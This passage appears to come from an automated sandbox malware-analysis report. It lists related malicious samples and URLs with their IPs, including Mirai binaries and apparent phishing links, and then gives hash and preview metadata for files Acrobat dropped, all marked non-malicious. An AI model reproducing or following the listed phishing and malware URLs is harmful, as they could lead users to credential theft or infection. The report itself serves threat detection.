        https://www.kentuckyfriedsalmonpadon.com/caHbBZmGet hashmaliciousUnknownBrowse
        • 104.22.57.245
        Solara_v3.exeGet hashmaliciousUnknownBrowse
        • 104.20.4.235
        AMAZON-02USmiori.m68k.elfGet hashmaliciousUnknownBrowse
        • 18.221.123.58
        https://link.hawkmarketplace.com/ls/click?upn=u001.NRX3OcAfcLfHWEd5qsjyzM6WT-2BF1VD5Gk5YbgIAYbY5U3l7YahZ9jFJiEbbS6IhBN6yYvKFeVvnzAjGEnyANBjGf6UhHhAeaI0f24bn3m8M-3DHEd8_ZxwDPev-2F4SWtaU7KVH4NQ3q5LCEea7ZiHXCgQiJrQ1jpoX7NCWIIGJClL-2BqW9-2BJ8dhfmmFfj6cPRkRgADgKcmt3XMWLYM3V7MFiCh8f014GFwkmQ3GEzOC8nL-2BOxe3qWJqB7aoQU5RKRMsfFPXsD4Zt-2Be2oroYIyJDNmWjUgDL5V7HAKgE194R1-2BYTOA6UadnB-2FMyPfxgtmNoA5XpjrfVAH50OiGYNfFIK-2F3aJ5rCoUYWz1YP18RYPxsUE9LavCbXpafbb24UXsSHjwy4rPeclHJt3tNf2SAVjBLt6j7rlUrDpc3-2FqO9y7WD1ZBsqXtnpWCQhDSZ924UU9le6tPESMTqmtxKUOlruY-2BzVXGgyEvtnAUlLXOuCct0jL2Du4cgr0gUZ2V-2FfH6mPhOS9rs7fW3nY-2FbFGnNg1OqISBN1rIMOcLsr0O1MZyLDfxW27bhudEr6njYPINhVMCgwtlalj6XYRz7b9SyPGHlBY6Ci2Gbcn32cL5aslGjCqtVDYGHKsFYo5jaIEPqGYISgsJiaPqmpFC8dLiEIvRcdJBMMJoPxX-2FIBBQmmC4f74WRmIvwdnghIavPV0ZvqAzKpaGndN-2BsJcX2FpWDJRu9rt0-2FX59eoGfPXYZU0Tgei5bwv2gDdKWDu6M2QuCLBM4IHa3a3HRauswtESBoBdu5v-2FJ04VJjlz8k9284YG4Cr9-2FyMDn6AwFh-2F5XNnMyOmiOrisCfxpaqbhpCj1BIF-2BOzhIy1rwY-2FA0CSTyLka9O73zS4Gp-2BIvyZEGNN-2BpDFcLQJEjSzBA993huIFGUPbuHdJ-2F-2FcF7i2mw6MAVMpzgEQkaPauPql95zvuXNqRkHqLXiZ-2Fl3p7k-2BjfBVJ-2FGwneL-2BhXZ8E4jTuza6Nmx10cRzpLfBicvf-2Bn3i9nrdUmzWjTe4MiNSNOTdym0BUPGe2fvFPQ-2FHsCyV5Y8T43YQb7sWM-2F11jhxMbvHfEffa-2FXAHokMr-2BhY23oqCQI1sD7nPmUzvqfqW0mMUmujg2hgXqoowzSalOUFi3se0F-2F50iXpiCygHyk5DP-2Bn-2BQ-3D-3DGet hashmaliciousHtmlDropperBrowse
        • 13.33.187.109
        sora.sh4.elfGet hashmaliciousMiraiBrowse
        • 13.208.161.5
        sora.mpsl.elfGet hashmaliciousMiraiBrowse
        • 34.241.254.66
        sora.spc.elfGet hashmaliciousMiraiBrowse
        • 108.140.146.105
        https://gmail.net-login.com/XcXRYNDdyQ3ZtSld4UE4wVUJrekFCdThLQ2ZDbXJubWlkcy85YXZZRFpSOGRHZ0lqc1lEVlJhUFJ4T1JpVkZYRHlPM2luOWZsUlg0akRFL0JzN3BQNEMzS2I3QUtSaG9zWXhKL1R0cG5TcEV6YUpSMkZRT1BkNGd1eVg1eHFjTW5CbVFQV0l5RXdmVG9qV2tod3dRS0ZpbkcvY3EwZk91cnM4R003RE1ESDZkNUoxOTZyTTZQcEExKy0tVmRVQklXeHltU1Jqc0VOaS0tMDhlR1IwQTdzanVybEhTdHNlbmhsZz09?cid=2354608568Get hashmaliciousKnowBe4Browse
        • 18.239.36.65
        http://sammobile.digidip.net/visit?url=https://massageclinic.com.au/wadblacks2&currurl=https://www.sammobile.com/2018/06/06/june-2018-security-patch-information-published-by-samsung/Get hashmaliciousGabagoolBrowse
        • 3.5.188.135
        sora.arm7.elfGet hashmaliciousMiraiBrowse
        • 18.188.26.124
        https://rb.iphiview.com/rb/Get hashmaliciousUnknownBrowse
        • 13.248.164.2
        https://g248jqtc.r.ap-south-1.awstrack.me/L0/https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/westcommerce.com.br/e63o/1750871326/Ara/%23%3Fnl=amRpYkBhcmEuY29t/1/0109019433d34740-32de3bb4-8eb6-4b18-a944-d8e7ee993673-000000/ImcP_D-hsLxxvDJopI2vRjkqrI4=188Get hashmaliciousUnknownBrowse
        • 13.126.216.240
        No context
        No context
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
        File Type:ASCII text
        Category:dropped
        Size (bytes):292
        Entropy (8bit):5.233181672535216
        Encrypted:false
        SSDEEP:6:iOpE+q2Pwkn2nKuAl9OmbnIFUtLG5ZmwlGtVkwOwkn2nKuAl9OmbjLJ:7pZvYfHAahFUtL6/lG5JfHAaSJ
        MD5:02AE33E874F1DE6A45862589585DC966
        SHA1:A9F1ABC8BCC1849A4A7F7575166D28736AEC7302
        SHA-256:A411C92C2A74AE8E0F9D83072DF868B14D3226A6EBB0452D0E274366B6577E38
        SHA-512:6DE8C719C593F2CAB62007638F000F8BAD31353A81ECED037A4B161CAD5A825E6BC4209D95285EAE1B5A220A3FAC5F1C2B3FB6AFD92BA4874FA64B7E2D56B548
        Malicious:false
        Reputation:low
        Preview:2025/01/07-13:48:50.654 1e18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/07-13:48:50.656 1e18 Recovering log #3.2025/01/07-13:48:50.656 1e18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
        File Type:ASCII text
        Category:dropped
        Size (bytes):292
        Entropy (8bit):5.233181672535216
        Encrypted:false
        SSDEEP:6:iOpE+q2Pwkn2nKuAl9OmbnIFUtLG5ZmwlGtVkwOwkn2nKuAl9OmbjLJ:7pZvYfHAahFUtL6/lG5JfHAaSJ
        MD5:02AE33E874F1DE6A45862589585DC966
        SHA1:A9F1ABC8BCC1849A4A7F7575166D28736AEC7302
        SHA-256:A411C92C2A74AE8E0F9D83072DF868B14D3226A6EBB0452D0E274366B6577E38
        SHA-512:6DE8C719C593F2CAB62007638F000F8BAD31353A81ECED037A4B161CAD5A825E6BC4209D95285EAE1B5A220A3FAC5F1C2B3FB6AFD92BA4874FA64B7E2D56B548
        Malicious:false
        Reputation:low
        Preview:2025/01/07-13:48:50.654 1e18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/07-13:48:50.656 1e18 Recovering log #3.2025/01/07-13:48:50.656 1e18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
        File Type:ASCII text
        Category:dropped
        Size (bytes):336
        Entropy (8bit):5.183116548066167
        Encrypted:false
        SSDEEP:6:iOp7djyq2Pwkn2nKuAl9Ombzo2jMGIFUtL7BD1Zmwl7JU3lRkwOwkn2nKuAl9OmT:7p7FyvYfHAa8uFUtL73/l7JU3lR5JfHA
        MD5:3176B44A5DC6BA40424A05F54B55CBD4
        SHA1:3E8054E68AC6D02A218F040ECA8F55DB63AC8526
        SHA-256:33E4C34DEA792B26929F23BC29542574D5A4B64702178B9C03C00A3D3108B3E9
        SHA-512:9E32A86FC46183E97307435631DA6678ECF54019C550CDBEB4BA21719F7340240C2E4E40D392C19F05429F6C57E657D2A53C8912FBF036C787BCB82A7E67E2D9
        Malicious:false
        Reputation:low
        Preview:2025/01/07-13:48:50.703 1ec4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/07-13:48:50.705 1ec4 Recovering log #3.2025/01/07-13:48:50.706 1ec4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
        File Type:ASCII text
        Category:dropped
        Size (bytes):336
        Entropy (8bit):5.183116548066167
        Encrypted:false
        SSDEEP:6:iOp7djyq2Pwkn2nKuAl9Ombzo2jMGIFUtL7BD1Zmwl7JU3lRkwOwkn2nKuAl9OmT:7p7FyvYfHAa8uFUtL73/l7JU3lR5JfHA
        MD5:3176B44A5DC6BA40424A05F54B55CBD4
        SHA1:3E8054E68AC6D02A218F040ECA8F55DB63AC8526
        SHA-256:33E4C34DEA792B26929F23BC29542574D5A4B64702178B9C03C00A3D3108B3E9
        SHA-512:9E32A86FC46183E97307435631DA6678ECF54019C550CDBEB4BA21719F7340240C2E4E40D392C19F05429F6C57E657D2A53C8912FBF036C787BCB82A7E67E2D9
        Malicious:false
        Reputation:low
        Preview:2025/01/07-13:48:50.703 1ec4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/07-13:48:50.705 1ec4 Recovering log #3.2025/01/07-13:48:50.706 1ec4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
        File Type:JSON data
        Category:dropped
        Size (bytes):475
        Entropy (8bit):4.966840896898424
        Encrypted:false
        SSDEEP:12:YH/um3RA8sqC2OHksBdOg2HNcaq3QYiubInP7E4T3y:Y2sRdsv2oJdMH83QYhbG7nby
        MD5:5921889271396BE5B6AF66BD8A79C5B7
        SHA1:1E74C2C81CB362C418A0D67D9A5EDDF096C3E0E1
        SHA-256:2F6A28B8296609AC5218175EEC0EC2FA760B4A4968551699021FD99DA489AF90
        SHA-512:BC421BC03D494DF510C14BC6A28D91A9E43FE24F4EF53B1ED741A4E0465FB81FDCA38F2EF93E38CF8D860599FB4331AF7A627D30678AAEC254B258065C3C2792
        Malicious:false
        Reputation:low
        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380835743245403","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":120736},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
        File Type:JSON data
        Category:modified
        Size (bytes):475
        Entropy (8bit):4.966840896898424
        Encrypted:false
        SSDEEP:12:YH/um3RA8sqC2OHksBdOg2HNcaq3QYiubInP7E4T3y:Y2sRdsv2oJdMH83QYhbG7nby
        MD5:5921889271396BE5B6AF66BD8A79C5B7
        SHA1:1E74C2C81CB362C418A0D67D9A5EDDF096C3E0E1
        SHA-256:2F6A28B8296609AC5218175EEC0EC2FA760B4A4968551699021FD99DA489AF90
        SHA-512:BC421BC03D494DF510C14BC6A28D91A9E43FE24F4EF53B1ED741A4E0465FB81FDCA38F2EF93E38CF8D860599FB4331AF7A627D30678AAEC254B258065C3C2792
        Malicious:false
        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380835743245403","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":120736},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
        File Type:data
        Category:dropped
        Size (bytes):4730
        Entropy (8bit):5.250747726390139
        Encrypted:false
        SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7Asr4TsZ:etJCV4FiN/jTN/2r8Mta02fEhgO73goH
        MD5:AC1115B806DE810C79C3151445E724E4
        SHA1:A9A22120C7F45BF6C34270D065DF7C78FA496A2D
        SHA-256:77BAB79F125A77D295D9ECC4A0B936D0951701439AABCDB9A73BB30E6D8FFC8E
        SHA-512:D61D1608DC181E5F74799DD73FF59F53A6FB83B37A2334111C217248AE643149938F6CFECBFBBA67D7D6256B7ECFC58BF162F5771945C1C1488CAC0577730017
        Malicious:false
        Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
        File Type:ASCII text
        Category:dropped
        Size (bytes):324
        Entropy (8bit):5.21101580144847
        Encrypted:false
        SSDEEP:6:iOpLm0lyq2Pwkn2nKuAl9OmbzNMxIFUtLLj1ZmwlxA+RkwOwkn2nKuAl9OmbzNMT:7py0lyvYfHAa8jFUtL1/lxA+R5JfHAab
        MD5:FFA9A68931EC804A640BCEB2F1A7F792
        SHA1:42BAC8BB9E646CC631570B5EB67543C8EB60EB7C
        SHA-256:074DD3B2B1C14CC44EB74AAA2C34F58C5DCD8F6EB7FBC67B0027DE3F86330B0C
        SHA-512:D7DBC1718F9952D99120548D7B4049AA4A3EE4BF15498B89DDEB22008D839FBEEBEA9CEF0508A99BBDDEE40B591DAB6BA57582F1DE586156D9F9E76EBBC09906
        Malicious:false
        Preview:2025/01/07-13:48:51.074 1ec4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/07-13:48:51.092 1ec4 Recovering log #3.2025/01/07-13:48:51.168 1ec4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
        File Type:ASCII text
        Category:dropped
        Size (bytes):324
        Entropy (8bit):5.21101580144847
        Encrypted:false
        SSDEEP:6:iOpLm0lyq2Pwkn2nKuAl9OmbzNMxIFUtLLj1ZmwlxA+RkwOwkn2nKuAl9OmbzNMT:7py0lyvYfHAa8jFUtL1/lxA+R5JfHAab
        MD5:FFA9A68931EC804A640BCEB2F1A7F792
        SHA1:42BAC8BB9E646CC631570B5EB67543C8EB60EB7C
        SHA-256:074DD3B2B1C14CC44EB74AAA2C34F58C5DCD8F6EB7FBC67B0027DE3F86330B0C
        SHA-512:D7DBC1718F9952D99120548D7B4049AA4A3EE4BF15498B89DDEB22008D839FBEEBEA9CEF0508A99BBDDEE40B591DAB6BA57582F1DE586156D9F9E76EBBC09906
        Malicious:false
        Preview:2025/01/07-13:48:51.074 1ec4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/07-13:48:51.092 1ec4 Recovering log #3.2025/01/07-13:48:51.168 1ec4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
        Category:dropped
        Size (bytes):71190
        Entropy (8bit):0.4619915957413378
        Encrypted:false
        SSDEEP:48:Ryyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyw:K9qrK
        MD5:9AE358E9D1B9506194A19F1D67307166
        SHA1:B623538351A8E4E520D4707B651FE9AD8B3F96E0
        SHA-256:696FD11EAE0BED7952E7B39BF5ECBAB959EAA95FE2D9BE246482DDD8161A2749
        SHA-512:96106956E96DDA1E060F4BED6E7DD1177DFBCC961EF876222E1E3A55C66139D8C93D808AECBF5DF36C9B0B381A251D3A6254852408E6E96EDFCFC70F062DD77A
        Malicious:false
        Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
        Category:dropped
        Size (bytes):86016
        Entropy (8bit):4.444837292006126
        Encrypted:false
        SSDEEP:384:yezci5tmiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rps3OazzU89UTTgUL
        MD5:7C6101F28EEA98EA82841E2650605AF3
        SHA1:E109172E0DB1F671609CBFD82D23D663ED1E6AA9
        SHA-256:B8F782EF2685F8818761DBCFDCC7D80F5D1178BAD875EA14CEDFD11D3BEF7661
        SHA-512:61CEE9704123961E5013E383155BF2821EDD3D745EFF61F5DEEA52FD4790DD709B414F14CA14F809B5C486179659EA5ABD2E5C0BC7BAAAF0C06A7D5FD3F4DD2B
        Malicious:false
        Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:SQLite Rollback Journal
        Category:dropped
        Size (bytes):8720
        Entropy (8bit):3.775072701262841
        Encrypted:false
        SSDEEP:48:7Mnp/E2ioyVNxioy9oWoy1Cwoy126KOioy1noy1AYoy1Wioy1hioybioyIuoy1nl:7QpjuHFyXKQ+kb9IVXEBodRBkm
        MD5:6FF24901A3CD5C7234C6E02FA94FC5F0
        SHA1:C71C874C9351B8C623C49E78F4E748406A0A35C0
        SHA-256:B803A0EA585D69B98F5DD3DE025B26584B6D3DD027729216AC66EF1AC14AE729
        SHA-512:18498CED2611525582F9264282170B04FB5727C6001915E15B833129ECDCAEB16556DBE82F7F38C47E47D891D8DBD6EC2C5363AE94B7065218E1BCC868798C36
        Malicious:false
        Preview:.... .c.......S................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
        File Type:Certificate, Version=3
        Category:dropped
        Size (bytes):1391
        Entropy (8bit):7.705940075877404
        Encrypted:false
        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
        Malicious:false
        Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
        Category:dropped
        Size (bytes):71954
        Entropy (8bit):7.996617769952133
        Encrypted:true
        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
        Malicious:false
        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
        File Type:data
        Category:dropped
        Size (bytes):192
        Entropy (8bit):2.7529698674325394
        Encrypted:false
        SSDEEP:3:kkFklNJw6llXfllXlE/HT8kutNNX8RolJuRdxLlGB9lQRYwpDdt:kKrO2T8JNMa8RdWBwRd
        MD5:7D23F98E54A4ABC06D92994E89D1C500
        SHA1:E17BBEAE23FA953532789DB23D175225EC3345A3
        SHA-256:2CD706B658EFFD21BEEC85C0D867F12A683E04E70AC55B68D9227306C99D7218
        SHA-512:E1C5AC82D46C207A01A6A6A3F936E07485F4EA55505BEACAC8BAB7F02B666DAE4CA45E55CF9D84BE6DDD6B9CFBED77C59BFD66FF5D996903DA38D68C83B2B5D3
        Malicious:false
        Preview:p...... ..........s.4a..(....................................................... ..........W...................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
        File Type:data
        Category:modified
        Size (bytes):328
        Entropy (8bit):3.234088949531399
        Encrypted:false
        SSDEEP:6:kKYOD9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:wjDImsLNkPlE99SNxAhUe/3
        MD5:435F7DC2BFAE9962B1CC2BAD897F9765
        SHA1:166072911482342CA5CA0BAAB932AEEE69A7EE3E
        SHA-256:9953ADCE1A587B1CC7D2582E3AE0F7C0CCDD97739B9770BCFF9BDB25D352759D
        SHA-512:133B358AF579A46D13E93C47173BF4745A9E4BE80BB71F3BE534A8BA443B7A51DA8F3AD5C018FC9B4A71CE087D86E57CC5A99929D54EFC3892BA269F51F40D46
        Malicious:false
        Preview:p...... ........C...4a..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:JSON data
        Category:dropped
        Size (bytes):295
        Entropy (8bit):5.361690769526417
        Encrypted:false
        SSDEEP:6:YEQXJ2HXpscFqBHVDVoZcg1vRcR0Yr5oAvJM3g98kUwPeUkwRe9:YvXKXRq2Zc0vZGMbLUkee9
        MD5:866C4149AF1445C2D6C238D31E24A2A7
        SHA1:DBAB7901C6D26204CF3CF76C4D066EBB9B88AB68
        SHA-256:FFB69A5CB0A2045298AE0582CC7BD704CFC978C7CD94148FA78334B7587BCA7B
        SHA-512:07EE7EEBC19EE289F4A2E320AE30F027AEB1A8A06AB0059D0146F8AB3399933BDDAD7E3EF0213D571716142B266525DF651378F598394CFB375CD0DF64FB600A
        Malicious:false
        Preview:{"analyticsData":{"responseGUID":"313554b1-9bc0-4a1d-95a0-d714db3721ba","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736449077075,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:JSON data
        Category:dropped
        Size (bytes):294
        Entropy (8bit):5.315414583584337
        Encrypted:false
        SSDEEP:6:YEQXJ2HXpscFqBHVDVoZcg1vRcR0Yr5oAvJfBoTfXpnrPeUkwRe9:YvXKXRq2Zc0vZGWTfXcUkee9
        MD5:DB4BEA5A434C2DBA38354CD510859C83
        SHA1:637CE86182DCED761AA41369EC416B51A9074A4C
        SHA-256:55B3C346828BA8F3D0F0F7191DA7574355CABAC160406886B0B83933333638C4
        SHA-512:1BF402599AABF0FB2D9AC9D5DA0727FD30A178F1CA30AA75A6D2E4FB84DF6B846C2FAAFB231AE346F1132C68A253CC08C28387DA084D2E25ADF303209BC1A1BA
        Malicious:false
        Preview:{"analyticsData":{"responseGUID":"313554b1-9bc0-4a1d-95a0-d714db3721ba","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736449077075,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:JSON data
        Category:dropped
        Size (bytes):294
        Entropy (8bit):5.293813902452768
        Encrypted:false
        SSDEEP:6:YEQXJ2HXpscFqBHVDVoZcg1vRcR0Yr5oAvJfBD2G6UpnrPeUkwRe9:YvXKXRq2Zc0vZGR22cUkee9
        MD5:8CA910F85AA4DD71122ABFE47F46E2CE
        SHA1:F8B7CC5A8722E5DDDDDAA3F45CE633C2DB1BBD6D
        SHA-256:B743E064EA40764011654647C70D0ADA54AC0BB5B1BE353312A44518A260D3CA
        SHA-512:B878C53B9822C7BDAC82D0D1A5ED2069075CFC1D5FFA24B5249E96D4149CE7F42F3DF922B7A82499A6A262DB7AF90D0B5663FB0C38475BECF203009C5876A263
        Malicious:false
        Preview:{"analyticsData":{"responseGUID":"313554b1-9bc0-4a1d-95a0-d714db3721ba","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736449077075,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:JSON data
        Category:dropped
        Size (bytes):285
        Entropy (8bit):5.348642587413128
        Encrypted:false
